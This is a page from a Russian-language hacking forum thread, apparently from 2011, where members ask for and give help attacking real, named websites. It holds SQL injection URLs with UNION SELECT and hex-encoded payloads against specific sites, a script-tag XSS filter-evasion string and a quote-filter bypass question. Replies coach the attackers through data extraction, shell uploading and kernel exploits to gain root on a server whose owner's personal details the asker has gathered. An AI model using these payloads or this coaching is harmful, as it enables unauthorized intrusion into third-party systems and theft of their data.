Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    То, что там два запроса, это верно, но не нужно сразу советовать крутить как слепую.
    Количество запросов на вывод не влияет, если вывод есть, то он будет.

    1NtR0

    http://forum.antichat.net/showpost.php?p=1047515&postcount=48

    У тебя тоже самое, только вместо ошибки выводится сам запрос.
     
    #16261 h00lyshit!, 5 Mar 2011
    Last edited: 5 Mar 2011
    2 people like this.
  2. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    та спалите же сайт, сколько страниц будете пантамиму делать?
     
    _________________________
    #16262 Konqi, 5 Mar 2011
    Last edited by a moderator: 5 Mar 2011
  3. omg_it_glowZ

    omg_it_glowZ New Member

    Joined:
    29 Jan 2011
    Messages:
    38
    Likes Received:
    1
    Reputations:
    -2
    Не помог, может можно какие-то символы поставить перед всеми этими именами, по типу знака "_" ?
     
  4. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    в тулзе есть такая возможность
     
    1 person likes this.
  5. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Угадать префикс оооочень маленький процент.
    Но если это популярная CMS, то есть специальные списки с популярными CMS'ками, где указано название CMS, список "интересных таблиц" (админы юзеры) и список колонок этих таблиц.
    Ссылки не помню, но помню, что составлял данный список уважаемый ettee.
     
  6. exT1ma4ka

    exT1ma4ka New Member

    Joined:
    12 May 2010
    Messages:
    47
    Likes Received:
    2
    Reputations:
    5
    подскажите, - как можно обойти фильтрацию кавычки при SQL-INJ в mssql ? в том случае, если обычная кавычка ' заменяется на
    PHP:
    '
    и кавычка " заменяется на
    PHP:
    "
    очень нужно..
     
  7. o'clock

    o'clock Elder - Старейшина

    Joined:
    16 May 2009
    Messages:
    125
    Likes Received:
    22
    Reputations:
    11
    Подскажите пожалуйста,что это значит.
    Есть сайт,я искал xss, и в поиск вписал <sc<script>ript>alert()</sc</script>ript>
    в итоге на сайте появилась вот такая штука [​IMG]
    а также поиск ответил
    что это может значить?
     
    #16267 o'clock, 6 Mar 2011
    Last edited by a moderator: 6 Mar 2011
  8. ZARO

    ZARO Elder - Старейшина

    Joined:
    17 Apr 2009
    Messages:
    327
    Likes Received:
    129
    Reputations:
    54
    Поздравляю, ты нашел пассивную XSS.
     
  9. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Не могу добиться вывода.

    http://art.uga.edu/people.php?id=5025+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+--+
     
  10. asql

    asql New Member

    Joined:
    19 Feb 2011
    Messages:
    32
    Likes Received:
    0
    Reputations:
    -3
    Лично для себя захотелось узнать, возможно ли провести sql'ку на
    http://www.aratta-ukraine.com/sacred_ua.php?id=9999999
    объясните плиз за +
     
  11. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    шаблоны
     
  12. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Какая здесь БД?

    http://www.row2k.com/polls/index.cfm?cat=college&ID=-265+%6f%72%64%65%72+by+5+--+&type=USRowing%20Collegiate%20Poll
     
  13. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886

    MSSQL
     
    _________________________
    #16273 Konqi, 7 Mar 2011
    Last edited: 8 Mar 2011
    1 person likes this.
  14. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    залил кучу шеллов таким образом на пхпбб3, никогда не появлялась ошибка..либо ты что то неправильно делаешь (что мало вероятно, так как там нет ничего сложного), либо мне не попадались такие форумы, кидай в пм посмотрим что сделать можно..
     
  15. kAtze

    kAtze New Member

    Joined:
    25 Jul 2010
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
    есть один сайт, расположенный на сервере, знаю на каком , знаю где находится датацентр, владельца доменных имён, его емайлы,знаю ФИО, мобильник, и какие фирмы на нём)) знаю что админ не закрыл доступ с разных айпи к серваку через ssh, надо узнать root пароль.
    просканил сервак на файлы имеющиеся на нём.

    одни их них
    robots.txt HTTP 200 OK
    .htaccess 302 Found
    .htconfig 302 Found
    .htpasswd 302 Found
    однако конечно же они закрыты) может быть могут быть полезными

    некоторые папки открытые, некоторые закрытые.
    поставил BT4 r2, с чего Начать?)))

    сайт проверять на дыры бесполезно. написан достаточно хорошо.

    OS-FreeBSD на серваке
     
  16. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    ну рут пароль к сайту вряд ли относится каким то боком...в папке сайта ты 99,99% не найдешь ничего что может тебе дать рута на серванте..ищи баги, заливай шелл..узнавай версию ядра..юзай сплоит..получай рута..
     
    1 person likes this.
  17. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Не могу обойти фильтрацию.

    http://www.funade.jp/english/course/detail.php?id=-46+union+select+1,2,3,4,5,6,7,8,9,10,11+--+
     
  18. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Там двойной запрос:

    http://www.funade.jp/english/course/detail.php?id=-46+union+select+1,2,3,4,5,6,7,8,9,10,11--+
    Code:
    SELECT * FROM root where p_id=-46 union select 1,2,3,4,5,6,7,8,9,10,11-- order by rank
    http://www.funade.jp/english/course/detail.php?id=-46+union+select+1,2,3,4,5,6,7,8,9,10--+
    Code:
    SELECT * FROM `place` WHERE id=-46 union select 1,2,3,4,5,6,7,8,9,10-- order by up_date

    Либо крути, как слепую с выводом в ошибку, либо: http://forum.antichat.ru/showpost.php?p=1047515&postcount=48
     
    1 person likes this.
  19. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Так как написано в этой статье вывести, не получается.

    Сейчас попробую вывести через ошибку.
     
  20. ZARO

    ZARO Elder - Старейшина

    Joined:
    17 Apr 2009
    Messages:
    327
    Likes Received:
    129
    Reputations:
    54
    Через ошибку в данной скули вывести не получится... Т.к. тут при неверном запросе просто показывает SQL запрос, который пошел в базу. А саму ошибку не показывает.
     
    2 people like this.
Thread Status:
Not open for further replies.